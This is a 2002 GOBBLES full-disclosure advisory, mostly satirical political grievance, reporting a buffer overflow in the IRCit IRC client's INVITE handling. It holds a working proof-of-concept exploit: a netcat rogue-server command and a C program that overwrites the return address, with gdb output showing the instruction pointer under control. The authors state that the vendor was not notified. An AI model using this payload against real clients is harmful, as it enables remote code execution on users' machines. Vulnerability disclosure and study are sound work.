-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 GOBBLES (http://www.bugtraq.org) ================================ GOBBLES Security Labs (GSL) is currently the largest non-profit security team in the world, with over 17 active members that are dedicated to bringing cutting edge material to the public that other groups are too afraid and/or selfish to do. Unlike some groups, GSL is at least honest about their intentions -- GSL members want fame and glory. We're not out to make friends (re: fat kid). ____________________ < GOBBLES LOVE ROUTE > -------------------- \ ,+*^^*+___+++_ \ ,*^^^^ ) \ _+* ^**+_ \ +^ _ _++*+_+++_, ) _+^^*+_ ( ,+*^ ^ \+_ ) { ) ( ,( ,_+--+--, ^) ^\ { (@) } f ,( ,+-^ __*_*_ ^^\_ ^\ ) {:;-/ (_+*-+^^^^^+*+*<_ _++_)_ ) ) / ( / ( ( ,___ ^*+_+* ) < < \ U _/ ) *--< ) ^\-----++__) ) ) ) ( ) _(^)^^)) ) )\^^^^^))^*+/ / / ( / (_))_^)) ) ) ))^^^^^))^^^)__/ +^^ ( ,/ (^))^)) ) ) ))^^^^^^^))^^) _) *+__+* (_))^) ) ) ))^^^^^^))^^^^^)____*^ \ \_)^)_)) ))^^^^^^^^^^))^^^^) (_ ^\__^^^^^^^^^^^^))^^^^^^^) ^\___ ^\__^^^^^^))^^^^^^^^)\\ ^^^^^\uuu/^^\uuu/^^^^\^\^\^\^\^\^\^\ ___) >____) >___ ^\_\_\_\_\_\_\) ^^^//\\_^^//\\_^ ^(\_\_\_\) ^^^ ^^ ^^^ ^ ABOUT THIS RELEASE ================== This is an emergency release. Politics are involved. Comic advisory coming soon. Thank you for understanding situation. POTENTIAL REMOTE ROOT VULNERABILITY IN IRCit IRC CLIENT (POSSIBLY MORE) ======================================================================== Everyone knows that comprimising an IRC client is the first step in hacking a "secure" operating system developer's personal IRC shell server. Hence this leads to the first of few steps to gain root on such a machine. GOBBLES Security members have found an exploitable remote vulnerability in the IRCit IRC Client, which can be downloaded from: http://www.asymmetrica.com/software/ircit/ IRCit is very dangerous software in all respects. As it claims to be IRC client for Information Terrorists. Proceed with caution and extreme prejudice. For details read rest of advisory hehehe ;PPppPPPP SOFTWARE VERSIONS AFFECTED ========================== . . . at least the Current version, turkey not going to waste he time and take look at old versions to post big long useless list of all vulnerable versions, and likewise not going to look for same bug occuring in clients and clients derived from this client, and clients derived from same client this one was derived from, this is task for Team Bugtraq (bugtraq@securityfocus.com) and for Team Vuln-Dev (vuln-dev@securityfocus.com) to do. GOBBLES not going to waste he time, when there political agenda to be taken care of in this advisory. MISCELLANEOUS ERRATA ==================== First, it was brought to the world's attention here that monkey.org had been comprimised and dugsong distributions were backdoored [1]. Then, here [2] we see doug sniff talking about how his server was comprimised, and he mentions a REMOTE CLIENT SIDE HOLE in a popular IRC client Epic[3], which was used in the hack of his server (or crack, if you have too much ego to admit to being comprimised by someone more skilled than yourself, as the case seems to be). We like to quote useless IETF drafts [4] and RFC's [5] in our advisories and other publications to show off that we're smart and read a lot of worthless papers, like real skilled geeks do. After reading this, GOBBLES Security members did visit www.epicsol.org and looked for information about this dastardly remote exploit that aides in the remote root comprimise of an OpenBSD developers and self proclaimed security expert's personal machine, and found no mention of a vulnerability, including no mention of it in the CHANGELOG[6]. Members of GOBBLES Security then tried to contact doug sniff via email [7], who ignored our inquries concerning the bug. We then approached whitehat[8] w00w00 leader Shok[9] to see if he could share any details on this w00w00-known 0day vulnerability in one of the most popular IRC clients. He also refused to even acknowledge us. Members of GOBBLES Security then attempted to post to mailing lists, such as bugtraq[10] and vulndev[11] concerning this quasi-known vulnerability, and were disappointed to see that all our posts on the matter were rejected. We then proceeded to browse through our collection of DEAR DIARY notes concerning vulnerabilities that we have discovered during various audits that we have not yet had the time to write advisories for, to see if we had any information on a remote hole in Epic. It turns out, we've yet to audit that client, but plan on it in the near future. We did come across notes regarding a somewhat related hole, which was written up into this very advisory that you are now reading. TECHNICAL DETAILS ================= GOBBLES-bugsquasher.c find following situation with full alert red flags in IRCit serverr.c sourcecode: ... STD_IRC_SERVER(sINVITE) { char *n, *h, *v; if (n=splitn(&from), !from) from="*@*"; if (v=splitw(&rest), ((rest)&&(*rest==':'))) rest++; if ((mt_ptr->c_ignore&IG_INVITE)==0) { char s[MAXHOSTLEN]; FIXIT(from); sprintf (s, "%s!%s", n, from); ... GOBBLES is not even going to comment on where he think problem is. Rogue IRC server that allow bad clients can allow the hijacking of IRCit information terrorist client by inviting he client to execute arbitrary code. EXPLOIT ======= To exploit GOBBLES use he #1 whitehat penetrator tool netcat: $ echo ":x"'!'`./GOBBLES-invite 0xcafebabe`"@x INVITE you :#GOBBLES" | nc - -l -p 6667 GOBBLES cut and paste he code especially for friend Al Huger: /* GOBBLES-invite.c */ #include int main(int argc, char **argv) { char heh[175], *store; int i; if(argc == 1) exit(0); sscanf(argv[1], "%p", &store); memset(heh, 'x', sizeof(heh)); *(long *)&heh[166] = (long)store; *(long *)&heh[170] = (long)store; heh[174] = '\0'; fprintf(stdout, "%s", heh); exit(0); } When GOBBLES connect he IRCit client he notice following in resulting coredump: (gdb) info reg eip eip 0xcafebabe 0xcafebabe (gdb) That mean GOBBLES now have remotely exploitable bug of EPIC proportions in IRCit irc client for information terrorists. VENDOR NOTIFICATION STATUS ========================== GOBBLES in security for fame, not friends. GOBBLES often criticized and immature method of not contacting vendor/programmer team come into play once more today, and this advisory sent out without any notification. Please divert flames from /dev/null stuff and send them to GOBBLES@hushmail.com so we all can sit in #!GOBBLES on irc looking at angry mails from critics calling us immature and stuff. GREETZ ====== all of w00w00, all of monkey.org, friends from Summercon 2002 (When are videos going to get put online of GOBBLES speech?!!? HURRY THIS EMERGENCY!#) including everyone whose name that GOBBLES already forget, especially nice people who buy dinner for GOBBLES, gweeds (thanks for free redbull), sl0ppy for being ethical and reading our email (hehe we love you anyway, GOBBLES still beat you in Greatest Hacks competition by one place though!!!), twd for discussing future of GOBBLES Security in relation to his ezine, and to girl who apologize profusely to naked GOBBLES for laughing at him during speech, hehehe ;PPPPpppp Speech notes and pornography will be available online very soon from Summercon, hehe, "GOBBLES LOVE ROUTE" and stuff, right now GOBBLES working on figuring out hosting issue to thwart wget-based ddos he website already experience (advisory coming soon on this subject). Double standards rule. CLOSING ======= Anyone who has pictures from Summercon 2002, please mail them to us (GOBBLES@hushmail.com), thanks! Remember, full disclosure is good, especially if political vendeta can be aired to the public in a w00w00 style hidden in such subtle manner as within security advisory. If you could provide the community with details concerning this socalled "Remote Root" hole in Epic, please do not hesitate to do so! Teasing the academic/professional security community with rumors of exploits is not an appropriate action for anyone who wants to call themselves a whitehat! [1] http://archives.neohapsis.com/archives/bugtraq/2002-05/0281.html [2] http://archives.neohapsis.com/archives/bugtraq/2002-05/0285.html [3] http://www.epicsol.org [4] http://www.ietf.org/ids.by.wg/webdav.html [5] http://www.rfc-editor.org/cgi-bin/rfcdoctype.pl?loc=RFC&letsgo=1459&type=ftp&file_format=txt [6] http://www.epicsol.org/changelog.phtml [7] dugsong@monkey.org (doug sniff) [8] http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0672.html [9] shok@dataforce.net (Matt Conover)) [10] http://archives.neohapsis.com/archives/vuln-dev/ [11] http://archives.neohapsis.com/archives/bugtraq/ -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlwEARECABwFAj0HaMAVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP9+4A n3XI0qqEJoZURxozpAhF6uBQenmoAJ9D1bXamS844pgNzwSUM7wKIn7/1Q== =5s6i -----END PGP SIGNATURE-----